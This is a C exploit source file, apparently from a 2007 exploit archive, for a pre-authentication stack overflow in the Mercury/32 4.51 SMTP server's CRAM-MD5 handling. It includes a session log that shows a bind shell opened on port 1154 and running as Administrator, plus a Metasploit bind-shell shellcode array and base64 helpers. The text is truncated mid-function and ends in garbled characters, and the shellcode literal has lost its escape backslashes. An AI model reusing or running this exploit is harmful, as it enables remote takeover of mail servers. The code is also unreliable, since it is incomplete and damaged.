
# Title : Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit
# Published : 2007-08-22
# Author : ZhenHan.Liu


/*
	Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
	Public Version 1.0
	http://www.ph4nt0m.org   
	2007-08-22
	
	Code by: Zhenhan.Liu
	Original POC: http://www.milw0rm.com/exploits/4294
	
	Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html
	
	Our Mail-list: http://list.ph4nt0m.org  (Chinese)

  It will bind a cmdshell on port 1154 if successful.

Z:ExpMercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
== Public Version 1.0
== http://www.ph4nt0m.org   2007-08-22

[*] connect to 127.0.0.1:25 ... OK!
[C] EHLO void#ph4nt0m.org
[S] 220 root ESMTP server ready.
[S] 250-root Hello void#ph4nt0m.org; ESMTPs are:
250-TIME
[S] 250-SIZE 0
[S] 250 HELP
[C] AUTH CRAM-MD5
[S] 334 PDM0OTg4MjguMzQ2QHJvb3Q+
[C] Send Payload...
[-] Done! cmdshell@1154?

Z:ExpMercury SMTPDMercury SMTPD>nc -vv 127.0.0.1 1154
DNS fwd/rev mismatch: localhost != gnu
localhost [127.0.0.1] 1154 (?) open
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

e:MERCURY>whoami
whoami
Administrator
  

*/

#include <io.h>
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")


/* win32_bind -  EXITFUNC=thread LPORT=1154 Size=317 Encoder=None http://metasploit.com */
/* Payload buffer sent after the CRAM-MD5 challenge (see the session log in the
   header comment). "Encoder=None" means the bytes are emitted exactly as the
   generator produced them, with no obfuscating encoder layer in front of them.
   NOTE(review): as reproduced on this page the "x.." escape sequences have
   lost their backslashes, so this literal is plain ASCII text rather than the
   317 raw bytes the generator comment above describes. */
unsigned char shellcode[] =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x04x82x66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0";



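// Base64 alphabet lookup: map a 6-bit value (0..63) to its encoding
// character from the standard RFC 4648 alphabet.
//
// index: value to encode; anything outside 0..63 yields the pad
//        character '=' instead of reading past the table.
// Returns the alphabet character, or '=' for an out-of-range index.
//
// Declared `static`: the original non-static `__inline` definition is, under
// C99/C11 inline semantics, an inline definition only and provides no
// external symbol, so a call the compiler chooses not to inline (e.g. an
// unoptimised build) fails to link. The helper is only used inside this file.
static inline char GetB64Char(int index)
{
    static const char kAlphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

    if (index < 0 || index >= 64) {
        return '=';
    }
    return kAlphabet[index];
}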


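// Byte-extraction helpers for a 32-bit value: B0 is the least significant
// byte, B3 the most significant. Every argument use and the whole expansion
// are parenthesized so that an expression argument such as B1(x | y) is not
// re-associated by the higher precedence of `>>` and `&` over `|`.
#define B0(a) ((a) & 0xFF)
#define B1(a) (((a) >> 8) & 0xFF)
#define B2(a) (((a) >> 16) & 0xFF)
#define B3(a) (((a) >> 24) & 0xFF)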


// Base64-encode src_len bytes of src into base64code; src_len == 0 means
// encode strlen(src) bytes. No output bound is checked, so the caller must
// make base64code large enough for the encoded output.
inline int Base64Encode(char * base64code, const char * src, int src_len) 
{   
    if (src_len == 0)
	src_len = strlen(src);
    
    int len = 0;
    unsigned char* psrc = (unsigned char*)src;
    char * p64 = base64code;
    for (int i = 0; i < src_len - 3; i += 3)
    {
	unsigned long ulTmp = *(unsigned long*)psrc;
	register int b0 = GetB64Char((B0(ulTmp) >> 2) & 0x3F); 
	register int b1 = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F); 
	register int b2 = GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F); 
	register int b3 = GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F); 
	*((unsigned long*)p64) = b0 | b1 << 8 | b2 << 16 | b3 << 24;
	len += 4;

	p64  += 4;

	psrc += 3;
    }
    
    // ?∩?|?